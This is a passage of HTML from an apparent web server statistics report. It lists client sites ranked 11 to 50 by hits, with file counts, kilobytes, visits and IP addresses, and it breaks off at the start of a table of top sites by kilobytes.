ALIGN=right><FONT SIZE="-2">18.03%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">199.21.99.69</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>101</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.98%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>90</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3768</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">206.169.235.14</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>95</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>82</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.60%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3899</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.19%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.68%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">68.186.101.141</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>86</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.68%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>85</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.70%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2358</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.93%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">173.10.98.81</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>81</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.59%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>78</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.48%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3316</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.71%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.68%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">66.189.222.224</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>80</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.57%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>74</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.35%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3491</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.68%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">199.196.224.102</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>78</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.53%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>45</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.43%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1074</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.88%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">67.212.188.154</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>76</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>52</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.65%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1071</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.88%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">99.198.111.42</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>73</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.43%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>65</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3314</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.71%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.68%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">38.100.226.83</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>63</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.23%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>56</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.78%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3698</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.03%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.68%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">200.59.197.6</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>62</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.21%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>57</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.81%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1848</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.51%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">72.233.211.13</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>59</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.16%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>46</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.46%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2752</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.25%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">63.226.245.113</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>56</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>54</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.71%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1352</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.11%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">66.171.188.148</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>53</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>51</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.62%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1323</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.68%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">207.250.79.99</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>51</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.00%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>50</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.59%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1240</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.01%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">50.34.245.162</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>48</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.94%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.83%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>356</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.29%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">70.161.177.214</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>41</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.80%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>38</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.21%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2685</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.20%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">174.127.153.66</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>27</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>40</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.78%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>37</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.17%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>808</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.66%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">208.79.144.67</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>28</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>40</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.78%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>34</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2340</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.92%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">65.47.30.114</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>39</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.76%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>34</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2548</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.09%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">131.107.0.84</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>30</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>39</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.76%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.79%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>712</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.58%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">131.191.104.80</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>31</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>35</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>33</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.05%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>879</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.72%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">72.233.211.37</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>32</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>34</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.67%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>32</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1117</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.91%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">174.21.88.135</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>33</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>33</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.65%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>33</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.05%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1132</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.93%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">199.106.165.81</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>34</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>33</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.65%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>33</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.05%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>924</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.76%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">70.89.119.142</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>35</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.70%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>638</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.52%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">72.233.231.244</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>36</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.47%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.70%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>646</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.53%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">178.210.218.166</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>37</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.45%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.73%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>535</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.44%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.68%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">78.86.76.53</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>38</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.43%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.35%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>77</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.74%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">208.115.113.91</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>39</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.43%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.70%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>537</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.44%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">72.233.232.168</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>40</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.41%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.25%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>75</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.72%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">208.115.111.75</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>41</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.35%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.51%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>315</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.26%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">72.233.213.20</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>42</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.27%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.35%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>59</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.05%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">69.58.178.56</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>43</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.27%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.32%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>287</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.24%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">95.108.158.240</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>44</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.24%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.38%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>269</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.22%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">61.9.18.97</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>45</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.16%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>181</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.15%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">66.249.72.193</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>46</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.14%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.13%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>703</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.58%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">66.249.72.173</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>47</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.14%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1267</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.68%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">66.249.72.194</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>48</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.14%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.22%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>192</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.16%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">93.138.109.202</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>49</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.12%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.19%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>67</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">38.100.21.14</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>50</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.68%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">66.249.72.111</FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=CENTER COLSPAN=10>Top 30 of 208 Total Sites By KBytes</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=center><FONT SIZE="-1">#</FONT></TH> <TH BGCOLOR="#008040" ALIGN=center 